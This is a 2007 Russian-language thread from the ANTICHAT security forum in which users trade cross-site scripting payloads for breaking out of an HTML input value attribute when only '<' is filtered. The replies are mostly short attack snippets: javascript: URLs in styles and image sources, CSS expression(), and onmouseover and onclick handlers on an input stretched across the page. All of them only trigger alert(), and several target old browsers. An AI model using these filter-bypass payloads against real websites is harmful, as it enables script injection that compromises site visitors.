HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Провести XSS в <input>
  #1  
Старый 30.06.2007, 09:08
hhover
Познающий
Регистрация: 21.05.2007
Сообщений: 61
Провел на форуме:
79888

Репутация: 145
По умолчанию Провести XSS в <input>

Собственно <input value="XSS" />
Фильтруется только <
Код:
<input value="" style=background-image:url('javascript:alert();'); />
Пашет только в ИЕ.
Есть другие способы javascript всунуть, кроме background-image ?
 
Ответить с цитированием

  #2  
Старый 30.06.2007, 09:47
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию

<input value="" onmouseover="alert('xek')" style="position:absolute;top:0;left:0;width:1600;h eight:1200;z-index:100;left:expression(alert('xek'));"/>
для Оперы и Огнелиса - Input растягивается на всю страницу и JavaScript пишется в onMouseOver.
для ИЕ есть возможность исполнять JavaScript через стиль используя expression()
 
Ответить с цитированием

  #3  
Старый 30.06.2007, 10:13
hhover
Познающий
Регистрация: 21.05.2007
Сообщений: 61
Провел на форуме:
79888

Репутация: 145
По умолчанию

Что-то я по серъезному тупанул, вообще забыл про события в javascript. =\
Спасибо, проблема решена.
 
Ответить с цитированием

  #4  
Старый 18.08.2007, 11:58
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию

Оказывается, есть и кроссбраузерный вариант:
<input value="" type=image src="javascript:alert()"/>
Но работает он только если тип input'a еще не был определен.
 
Ответить с цитированием

  #5  
Старый 18.08.2007, 15:07
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

<input type=button OnClick="javascript:alert()">

Наверное так тоже сработает, хотя хз я все позабыл на хрен! =/
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
phpbb 2.0.19 можно ли провести xss атаку на форумы таких версий Taylorith Уязвимости CMS / форумов 15 18.01.2007 18:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ